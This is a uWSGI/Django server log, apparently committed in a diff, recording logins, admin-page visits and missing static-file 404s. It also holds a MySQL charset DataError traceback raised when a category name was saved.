+[pid: 11057|app: 0|req: 790/1040] 219.228.146.156 () {48 vars in 1009 bytes} [Thu Jan 14 08:39:13 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 791/1041] 219.228.146.156 () {40 vars in 913 bytes} [Thu Jan 14 08:39:14 2021] GET /home/ => generated 7869 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 792/1042] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:39:21 2021] POST /login/ => generated 82 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 793/1043] 180.160.72.163 () {42 vars in 1112 bytes} [Thu Jan 14 08:39:26 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /favicon.ico
+[pid: 11057|app: 0|req: 794/1044] 180.160.72.163 () {40 vars in 1028 bytes} [Thu Jan 14 08:39:26 2021] GET /favicon.ico => generated 3480 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 795/1045] 180.160.72.163 () {48 vars in 1170 bytes} [Thu Jan 14 08:39:38 2021] POST /my-admin/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 796/1046] 180.160.72.163 () {42 vars in 1117 bytes} [Thu Jan 14 08:39:39 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 797/1047] 180.160.72.163 () {42 vars in 1119 bytes} [Thu Jan 14 08:39:39 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1048] 180.160.72.163 () {40 vars in 1070 bytes} [Thu Jan 14 08:39:39 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1049] 180.160.72.163 () {40 vars in 1004 bytes} [Thu Jan 14 08:39:39 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1050] 180.160.72.163 () {40 vars in 1016 bytes} [Thu Jan 14 08:39:39 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1051] 180.160.72.163 () {40 vars in 1033 bytes} [Thu Jan 14 08:39:39 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1052] 180.160.72.163 () {40 vars in 985 bytes} [Thu Jan 14 08:39:39 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1053] 180.160.72.163 () {40 vars in 1045 bytes} [Thu Jan 14 08:39:39 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1054] 180.160.72.163 () {40 vars in 1009 bytes} [Thu Jan 14 08:39:39 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1055] 180.160.72.163 () {40 vars in 1051 bytes} [Thu Jan 14 08:39:39 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1056] 180.160.72.163 () {40 vars in 997 bytes} [Thu Jan 14 08:39:40 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1057] 180.160.72.163 () {40 vars in 1073 bytes} [Thu Jan 14 08:39:40 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1058] 180.160.72.163 () {40 vars in 995 bytes} [Thu Jan 14 08:39:40 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1059] 180.160.72.163 () {40 vars in 1069 bytes} [Thu Jan 14 08:39:40 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 798/1060] 180.160.72.163 () {40 vars in 1086 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 799/1061] 180.160.72.163 () {40 vars in 1074 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 800/1062] 180.160.72.163 () {40 vars in 1078 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 801/1063] 180.160.72.163 () {40 vars in 1042 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 802/1064] 180.160.72.163 () {40 vars in 1062 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 803/1065] 180.160.72.163 () {40 vars in 1062 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 804/1066] 180.160.72.163 () {40 vars in 1118 bytes} [Thu Jan 14 08:39:42 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 805/1067] 180.160.72.163 () {40 vars in 1010 bytes} [Thu Jan 14 08:39:42 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 806/1068] 180.160.72.163 () {40 vars in 1008 bytes} [Thu Jan 14 08:39:43 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 807/1069] 180.160.72.163 () {42 vars in 1121 bytes} [Thu Jan 14 08:39:48 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 808/1070] 180.160.72.163 () {42 vars in 1123 bytes} [Thu Jan 14 08:39:48 2021] GET /kind-manage/ => generated 8283 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 809/1071] 180.160.72.163 () {40 vars in 1075 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 810/1072] 180.160.72.163 () {40 vars in 1087 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 811/1073] 180.160.72.163 () {40 vars in 1043 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 813/1074] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 814/1075] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 814/1076] 180.160.72.163 () {40 vars in 1079 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 26 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 815/1077] 180.160.72.163 () {40 vars in 1009 bytes} [Thu Jan 14 08:39:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 816/1078] 180.160.72.163 () {40 vars in 1007 bytes} [Thu Jan 14 08:39:48 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 817/1079] 180.160.72.163 () {40 vars in 1118 bytes} [Thu Jan 14 08:39:48 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 541, in kind_manage
+ models.Kind.objects.create(k_name=k_name)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1")
+[pid: 11057|app: 0|req: 818/1080] 180.160.72.163 () {48 vars in 1178 bytes} [Thu Jan 14 08:40:07 2021] POST /kind-manage/ => generated 207189 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 819/1081] 180.160.72.163 () {42 vars in 1124 bytes} [Thu Jan 14 08:40:07 2021] GET /kind-manage/? => generated 8283 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 820/1082] 180.160.72.163 () {40 vars in 1087 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 821/1083] 180.160.72.163 () {40 vars in 1075 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 822/1084] 180.160.72.163 () {40 vars in 1079 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 823/1085] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.72.163 client_port: 1746] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 824/1086] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 825/1087] 180.160.72.163 () {40 vars in 1043 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 36 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 826/1088] 180.160.72.163 () {40 vars in 1119 bytes} [Thu Jan 14 08:40:07 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 827/1089] 180.160.72.163 () {40 vars in 1011 bytes} [Thu Jan 14 08:40:07 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 828/1090] 180.160.72.163 () {40 vars in 1009 bytes} [Thu Jan 14 08:40:07 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 829/1091] 61.151.179.84 () {32 vars in 498 bytes} [Thu Jan 14 08:40:43 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 830/1092] 101.91.62.89 () {32 vars in 593 bytes} [Thu Jan 14 08:40:51 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 831/1093] 101.91.60.106 () {32 vars in 505 bytes} [Thu Jan 14 08:41:00 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 832/1094] 180.160.72.163 () {40 vars in 1075 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 833/1095] 180.160.72.163 () {40 vars in 1087 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 834/1096] 180.160.72.163 () {40 vars in 1043 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 835/1097] 180.160.72.163 () {40 vars in 1079 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 836/1098] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 837/1099] 180.160.72.163 () {40 vars in 1063 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 838/1100] 180.160.72.163 () {40 vars in 1011 bytes} [Thu Jan 14 08:41:06 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 839/1101] 180.160.72.163 () {40 vars in 1119 bytes} [Thu Jan 14 08:41:06 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 840/1102] 180.160.72.163 () {40 vars in 1009 bytes} [Thu Jan 14 08:41:06 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 841/1103] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:41:12 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 842/1104] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:41:29 2021] POST /login/ => generated 27 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 843/1105] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:41:29 2021] GET /home/ => generated 7869 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 844/1106] 180.160.72.163 () {42 vars in 1103 bytes} [Thu Jan 14 08:41:35 2021] GET /home/ => generated 7869 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[]
+[pid: 11057|app: 0|req: 845/1107] 180.160.72.163 () {42 vars in 1111 bytes} [Thu Jan 14 08:41:37 2021] GET /all-3-0-0 => generated 8291 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1108] 180.160.72.163 () {40 vars in 1007 bytes} [Thu Jan 14 08:41:37 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1109] 180.160.72.163 () {40 vars in 1005 bytes} [Thu Jan 14 08:41:37 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 846/1110] 180.160.72.163 () {50 vars in 1258 bytes} [Thu Jan 14 08:41:38 2021] POST /all-0-0-0 => generated 8267 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 847/1111] 180.160.72.163 () {50 vars in 1258 bytes} [Thu Jan 14 08:41:45 2021] POST /all-0-0-0 => generated 8267 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1112] 219.228.146.156 () {40 vars in 914 bytes} [Thu Jan 14 08:42:14 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 848/1113] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:43:22 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 849/1114] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:43:35 2021] POST /login/ => generated 27 bytes in 27 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 850/1115] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:43:35 2021] GET /home/ => generated 7864 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 851/1116] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:43:49 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 852/1117] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:43:50 2021] POST /login/ => generated 82 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 853/1118] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:43:59 2021] POST /login/ => generated 27 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 854/1119] 180.160.72.163 () {42 vars in 1104 bytes} [Thu Jan 14 08:43:59 2021] GET /home/ => generated 7864 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 855/1120] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:45:20 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
